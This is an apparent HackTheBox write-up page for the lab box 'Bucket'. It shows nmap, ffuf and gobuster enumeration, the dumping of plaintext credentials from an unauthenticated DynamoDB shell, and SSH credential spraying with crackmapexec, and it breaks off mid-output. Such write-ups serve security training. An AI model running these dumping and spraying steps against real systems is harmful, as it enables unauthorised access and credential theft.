bucket.html
395 lines (355 loc) · 105 KB
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Bucket - HackTheBox Writeup (10.10.10.212) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Bucket - HackTheBox Writeup (10.10.10.212)">
<meta name="description" content="Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.">
<meta property="og:description" content="Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/3f07dd46f3ff7d287d2f736b18c6ded7.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/3f07dd46f3ff7d287d2f736b18c6ded7.png"></span>
</div>
<h1 class="Header__Title">Bucket - HackTheBox Writeup (10.10.10.212)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sun, May 2, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Amazon_DynamoDB">Amazon DynamoDB</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Amazon_S3">Amazon S3</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Pd4Cmd">Pd4Cmd</a>
</span>
</div>
<div>
Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.
</div>
</header>
<article id="https://www.notion.so/09bb09bcdcdc42a98709118e15580e62" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/a79c85890e4946578d3a3421f459b4bc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/a79c85890e4946578d3a3421f459b4bc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9ab38b2034a14a77ba6e8ceb171f1cdd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/673f969a7bda423c85d7e1fbadf2fb9c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.212 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/29c69f07fffa47d9ae3843a37c0cc091" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
80/tcp open http</span></span></span></code></pre></li><li id="https://www.notion.so/28af846f7a0c4291a3e856fb431750c3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/fa3b3b4955b641ba98538b289bac76ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80 10.10.10.212 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/6c8983377b0d4ebd997837ed5321fdea" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span></span></code></pre><div id="https://www.notion.so/9cf3d78430984948bca7319bd75c9e78" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">OpenSSH 8.2p1 Ubuntu 4, Apache httpd 2.4.41</span></span></p></div></li></ul><h2 id="https://www.notion.so/16f7f08264204ab990e9474caa21c211" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/16f7f08264204ab990e9474caa21c211"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/ff95ccf4d0f846a79bddd8c85b088592" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/da3e8b4ad69847849f882f85d0d120f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Nmap targeted scan reveals vhost </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb/</a></span><span class="SemanticString"> on port 80, add the following entry to </span><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/2f09cd7e994f4f24a476cc5971461364" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/54ebd5edef284c62a703a1dac6b877dd" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.212 bucket.htb</span></span></span></code></pre></li><li id="https://www.notion.so/745cb1b3084348dea097de46c4651f81" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Website is an advertising platform for an infosec-centered marketing company.</span></span></li><li id="https://www.notion.so/e97f34ab2e3346c79ea3a170448d78d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found support email address:</span></span><div id="https://www.notion.so/c385e64ee01647cb863d2395a9725dd1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">support@bucket.htb</code></span></span></p></div></li><li id="https://www.notion.so/f9097279cdad4dc59dec15231875f3f9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found subdomain for Amazon Simple Storage Service (Amazon S3), append it to the entry in the hosts file:</span></span><div id="https://www.notion.so/80479d9b8f124b91ab4cbd6252105b4e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">http://s3.bucket.htb</code></span></span></p></div></li><li id="https://www.notion.so/e5c8a9e7f8b44a7abe00a26a1cc0b393" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">adserver</code></span><span class="SemanticString"> directory from image addresses:</span></span><div id="https://www.notion.so/3290de1630184390b022919234d20489" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://s3.bucket.htb/adserver/</code></span></span></p></div><div id="https://www.notion.so/ff13cb0cddaf4150819581dd281119b3" class="ColorfulBlock ColorfulBlock--BgGray Callout"><div class="Callout__Icon"><div class="Icon">⚠️</div></div><p class="Callout__Content"><span class="SemanticStringArray"><span class="SemanticString">Optional: If the images on the website are not loading correctly, try disabling any adblocking extensions on your browser.</span></span></p></div></li><li id="https://www.notion.so/25125e516e31445cbf0cc216b2609ab8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Output upon visiting:</span></span><pre id="https://www.notion.so/cc44983c2a87438e95dd251456d92c50" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"status"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/5aa67c88126343ee89dd1ae33efa1717" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerate subdomains with </span><span 
class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ffuf</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/322a29a798f2429287f906a6d7aae555" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ffuf -c -w ../Common/directory-list-2.3-medium.txt -u http://bucket.htb -H "Host: FUZZ.bucket.htb" -fc 302</code></span></span></p></div></li><li id="https://www.notion.so/e7192724e4a84d179da90856f4a43be1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Bruteforce directory on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString"> and </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://s3.bucket.htb/">http://s3.bucket.htb</a></span><span class="SemanticString"> with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/9f67fdf8452e473bb856d9247fc23b2b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://bucket.htb -t 50 -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div><pre id="https://www.notion.so/d2372999edc14929a631952c8a0cae6f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>/index.html (Status: 200)</span></span></span></code></pre><div 
id="https://www.notion.so/90d0f1e5352d4da0973086f867733429" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://s3.bucket.htb -t 50 -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div><pre id="https://www.notion.so/25c1f6dce52942aeb10d2bd7abc426f9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>/health (Status: 200)
/shell (Status: 200)
/server-status (Status: 403)</span></span></span></code></pre></li><li id="https://www.notion.so/3716c058b9a348d4859ff39d85999b95" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">From the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/health</code></span><span class="SemanticString"> page we can see that a DynamoDB is being hosted through Amazon Web Services on this subdomain:</span></span><pre id="https://www.notion.so/1c144143dbb843ac994a81fe827d1adb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"services"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token property">"s3"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">,</span> <span class="token property">"dynamodb"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">}</span><span class="token punctuation">}</span></span></span></span></code></pre></li></ul><div id="https://www.notion.so/53cf3da90e0c4cc7a897bfcdda074859" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">DynamoDB Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/c81a3572934b4d969e19321c0bf09fff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Interacting with the DynamoDB JavaScript shell on </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/shell</code></span><span class="SemanticString"> requires no 
authentication.</span></span></li><li id="https://www.notion.so/c72fe21b1ead42f5916debc8e1f7cebd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The shell includes the ability to download and upload scripts to be run, and also has API templates available for interacting with the database.</span></span></li><li id="https://www.notion.so/f03f3dd7072040808a11b04a7eb8f70f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating tables on the database with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ListTables.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/00df92adb0d446ba923c9d4f7e463168" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">ExclusiveStartTableName</span><span class="token operator">:</span> <span class="token string">'table_name'</span><span class="token punctuation">,</span> <span class="token comment">// optional (for pagination, returned as LastEvaluatedTableName)</span>
<span class="token literal-property property">Limit</span><span class="token operator">:</span> <span class="token number">10</span><span class="token punctuation">,</span> <span class="token comment">// optional (to further limit the number of table names returned per page)</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
dynamodb<span class="token punctuation">.</span><span class="token function">listTables</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// an error occurred</span>
<span class="token keyword">else</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// successful response</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/46f574ce4851455d91f8a97c50a1b53b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/c73c0a2219cb48ac987f35459ef6d42b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token string">"TableNames"</span> <span class="token punctuation">[</span>
<span class="token string">"users"</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/989339d2050f4f4b95363b72b9087114" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The database has only one table, named </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString">, a name commonly used for tables that store user credentials, sometimes including hashed passwords.</span></span></li><li id="https://www.notion.so/b24c26b972694a50ba26088118631777" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating information about the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString"> table with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">DescribeTable.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/72744d712391463b8964984d426b1020" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">TableName</span><span class="token operator">:</span> <span class="token string">'users'</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
dynamodb<span class="token punctuation">.</span><span class="token function">describeTable</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// an error occurred</span>
<span class="token keyword">else</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// successful response</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/a8472b63816e410e82a2305eac15adc0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/9c47dad3a8f040d6835fcc79ce67abdf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token string">"Table"</span> <span class="token punctuation">{</span>
<span class="token string">"AttributeDefinitions"</span> <span class="token punctuation">[</span>
<span class="token number">0</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"username"</span>
<span class="token property">"AttributeType"</span><span class="token operator">:</span><span class="token string">"S"</span>
<span class="token number">1</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"password"</span>
<span class="token property">"AttributeType"</span><span class="token operator">:</span><span class="token string">"S"</span>
<span class="token property">"TableName"</span><span class="token operator">:</span><span class="token string">"users"</span>
<span class="token string">"KeySchema"</span> <span class="token punctuation">[</span>
<span class="token number">0</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"username"</span>
<span class="token property">"KeyType"</span><span class="token operator">:</span><span class="token string">"HASH"</span>
<span class="token number">1</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"password"</span>
<span class="token property">"KeyType"</span><span class="token operator">:</span><span class="token string">"RANGE"</span>
<span class="token property">"TableStatus"</span><span class="token operator">:</span><span class="token string">"ACTIVE"</span>
<span class="token property">"CreationDateTime"</span><span class="token operator">:</span><span class="token string">"2021-02-01T05:19:06.086Z"</span>
<span class="token string">"ProvisionedThroughput"</span> <span class="token punctuation">{</span>
<span class="token property">"LastIncreaseDateTime"</span><span class="token operator">:</span><span class="token string">"1970-01-01T00:00:00.000Z"</span>
<span class="token property">"LastDecreaseDateTime"</span><span class="token operator">:</span><span class="token string">"1970-01-01T00:00:00.000Z"</span>
<span class="token property">"NumberOfDecreasesToday"</span><span class="token operator">:</span><span class="token number">0</span>
<span class="token property">"ReadCapacityUnits"</span><span class="token operator">:</span><span class="token number">5</span>
<span class="token property">"WriteCapacityUnits"</span><span class="token operator">:</span><span class="token number">5</span>
<span class="token property">"TableSizeBytes"</span><span class="token operator">:</span><span class="token number">107</span>
<span class="token property">"ItemCount"</span><span class="token operator">:</span><span class="token number">3</span>
<span class="token property">"TableArn"</span><span class="token operator">:</span><span class="token string">"arn:aws:dynamodb:us-east-1:000000000000:table/users"</span></span></span></span></code></pre></li><li id="https://www.notion.so/cb11a44026b543508672f858f024dfb5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Dump contents of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString"> table with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Scan.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/6c73245d7e1448a98cecf14ab1228ba4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">TableName</span><span class="token operator">:</span> <span class="token string">'users'</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
docClient<span class="token punctuation">.</span><span class="token function">scan</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">else</span> console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/ddb75a51a20a41e882ea2e058c85afe1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/480a7b28b39d4b3693d49b944bb71740" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"Items"</span><span class="token operator">:</span><span class="token punctuation">[</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"Management@#1@#"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Mgmt"</span><span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"Welcome123!"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Cloudadm"</span><span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"n2vM-<_K_Q:.Aa2"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Sysadm"</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token property">"Count"</span><span class="token operator">:</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token property">"ScannedCount"</span><span class="token operator">:</span><span class="token number">3</span><span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/2810caede1e048a38738f1aae42d62d8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found credential pairs:</span></span><div id="https://www.notion.so/3e4dd94929e0466a9e56780e956ee6c9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Mgmt:Management@#1@#</code></span></span></p></div><div id="https://www.notion.so/8246f5d2fce342eb9e9af39d6f064724" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Cloudadm:Welcome123!</code></span></span></p></div><div id="https://www.notion.so/c0f4cfb6407e438287fdbbfa6d5b2e04" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Sysadm:n2vM-<_K_Q:.Aa2</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/070ab77375764fb6ad32a924df09e8ee" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/070ab77375764fb6ad32a924df09e8ee"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/c31877c479bc4f06b201e7839497df3c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Attempt to SSH with new credentials:</span></span><div id="https://www.notion.so/33924f62221f4b8faa84413bbb8c3f2a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec ssh 10.10.10.212 -u ./users.txt -p ./passwords.txt</code></span></span></p></div><pre id="https://www.notion.so/9f9947042a3f4cc09aaf30f6926fc95d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Mgmt:n2vM-<_K_Q:.Aa2 Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Cloudadm:n2vM-<_K_Q:.Aa2 Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:Welcome123! Authentication failed.
